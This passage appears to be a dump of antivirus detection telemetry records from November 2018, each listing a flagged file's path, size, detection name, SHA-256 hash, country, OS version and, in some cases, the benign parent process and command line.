  Row(detection=Row(filename='jolt.exe', filepath='\\\\?\\C:\\Windows\\jolt.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\D:\\Program Files\\SoftLogica\\Handy Recovery\\Uninstall.exe', filesize=704000, name='W32/Sality.AT.#M1.#R1'), hash='b865f5b7f30172928d49218f444b21bd85c470b7663e84a0270b10ac6b2a40cd', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpxlcu1kjb', filepath='/tmp/tmpxlcu1kjb', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\Nova pasta\\IMOBILIZADOR\\21-OUTROS SOFTWARES\\ST10 FLASHER Software\\St10Flasher material trabalho\\Software Instalador ST10 FLASHER\\INSTALADOR  ST10 Flasher_v24b\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='8d0f7b33c081a01c31834287b75635d63481576348f921109676845d2e24a976', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobe edge animate cc 2015.0 repack by d!akov.exe', filepath='\\\\?\\D:\\Downloads\\Torrent\\Adobe Edge Animate CC 2015.0 RePack by D!akov.exe', filesize=165456000, name='Adware/HiRu.uucms.#M1.#R1'), hash='a35292ee0566599fc82370016dc6f62bd52ea832956935f98fdee67c73cfde91', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:53:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115012-a7bcaf41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2da4c223\\AVSCAN-20181102-112332-4FE88DF4\\AVSCAN-20181102-115012-A7BCAF41', filesize=7168000, name='TR/Crypt.ZPACK.Gen7.#M1.#R1'), hash='a664655308fafed73a4d9c078e48f60eabdb5858ec6104936c0f983c673adac0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0hs23cup1uk\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flex.exe', filepath='F:\\output\\flex\\flex.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:53:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{DC7A9AF2-4E10-4F1C-BF23-AD934E0E5040}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b2fe9386f50e24bb260b35b6e0e706ab082c145ff288472ff1da90a3babcccad', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a7a0fd00806114fe7d21a90490249b6cf7a2850ba6b44579093c538d5ff6d9d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-012656-78fa7ba3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e5e9153\\AVSCAN-20181103-011832-5BA9888E\\AVSCAN-20181103-012656-78FA7BA3', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:27:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freehdsport tv-bg.exe', filepath='\\\\?\\C:\\Program Files\\FreeHDSport TV\\FreeHDSport TV-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='d0d1d9e957e10e2f2b7d23c449216c31fc5f45125a39233909c35025b2b81306', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145433-f0d57c4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42132921\\AVSCAN-20181102-145319-E3DB711D\\AVSCAN-20181102-145433-F0D57C4D', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:54:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-214028-b9b3fc46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ea6c146\\AVSCAN-20181104-210551-802B9C0A\\AVSCAN-20181104-214028-B9B3FC46', filesize=6576000, name='TR/Crypt.ZPACK.Gen4.#M1.#R1'), hash='b17d7248409cd6d644fea097f39d3f9946d799d9a7cb51af45c1583fee67f1d1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134352-1c196e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134352-1C196E2E', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133049-860c22bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133049-860C22BB', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:30:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124735-a7dbe6f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_112b9ab9\\AVSCAN-20181104-122007-0EB1DF05\\AVSCAN-20181104-124735-A7DBE6F4', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='e1f89e255d1369348e284053014b9cd2c1b3b77e5cb6078e81e5c1849f550c87', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291a5f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291a5f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:57:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002395c3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002395c3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:40:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161317-5f24636c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-161317-5F24636C', filesize=512000, name='ADWARE/Taranis.3958.#M1.#R1'), hash='dcae30c8c3eba52071f63a022d70808bbd48d73dd5f12cfde5d8b0b4f90bebbd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:43:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293760', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293760', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:30:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (6).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (6).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='smass.exe', filepath='\\?\\C:\\Documents and Settings\\X\\Application Data\\Microsoft\\Windows\\WindowsAccManager\\smass.exe', filesize=128000, name='HEUR/AGEN.1029516.#M1.#R1'), hash='e5078a9da00d833ce1d6b197c97b64a623ec8a2c291217bff785e5584f65b4c2', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='world of tanks.exe', filepath='C:\\Program Files (x86)\\World of tanks\\World of tanks.exe', filesize=320000, name='TR/BWrapper.320000.#M0.#R0'), hash='e000419fe7799c01c4b04d95f6979eca1239502c258c6edd425f983890400b04', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:32:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144908-5099302c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17eba65b\\AVSCAN-20181104-144651-3700B9B0\\AVSCAN-20181104-144908-5099302C', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:49:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f325037ca3c79c5dd0ada16881c59246e5044d1d1c165e93fd9c09b6d59a209c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:34:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=23040, timestamp='2018-11-04T18:23:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f856630bbf214c28a94fdee5795ff99204ed58d6c997890f6ed937d811ba8cab', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F856630BBF214C28A94FDEE5795FF99204ED58D6C997890F6ED937D811BA8CAB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f856630bbf214c28a94fdee5795ff99204ed58d6c997890f6ed937d811ba8cab', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:36Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-155828-e3457688', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155828-E3457688', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-17-42-00.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T18:58:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155940-eb0d388a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155940-EB0D388A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-WORKS\\SoftGOT\\SystemDriver5382G\\Win_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='1c8effe47d47beec4830b1eac5c70d12faeed6d9f77dd0e055ce5acc523c0cf1', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100301-2144ef3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b3c77d8\\AVSCAN-20181102-100046-0F54566B\\AVSCAN-20181102-100301-2144EF3B', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190234-762b3dd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d5ec04e\\AVSCAN-20181102-185412-19B88F55\\AVSCAN-20181102-190234-762B3DD5', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46AD39EA3436E1A73207968F8D137F6078072924091B2ECD1EC328687B7E9DE5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-192332-b8e78b57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03d723a3\\AVSCAN-20181101-191322-758FF685\\AVSCAN-20181101-192332-B8E78B57', filesize=7872000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='3640d6a3517401d2d33b731a1eb03c16559f3d56a60917dc6d4fc308dd14205b', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1dadf2f6c363147e08ef2895c70a4861fb47b9823de978a0f007a04e8c136994', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='coli.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\COLI\\COLI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='5ac3e3d417e155cdf1927e3f872654ae40655b0ebf8fb8901a9f01ce0fc3617f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183758-0d7ba6b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-183752-0C76AA10\\AVSCAN-20181102-183758-0D7BA6B9', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000106f3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp000106f3', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gabungan.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\GABUNGAN\\GABUNGAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-02T02:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='F:\\HBCD\\Programs\\DriverImportPE.exe', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:09Z'), dt=datetime.date(2018, 11, 2)),
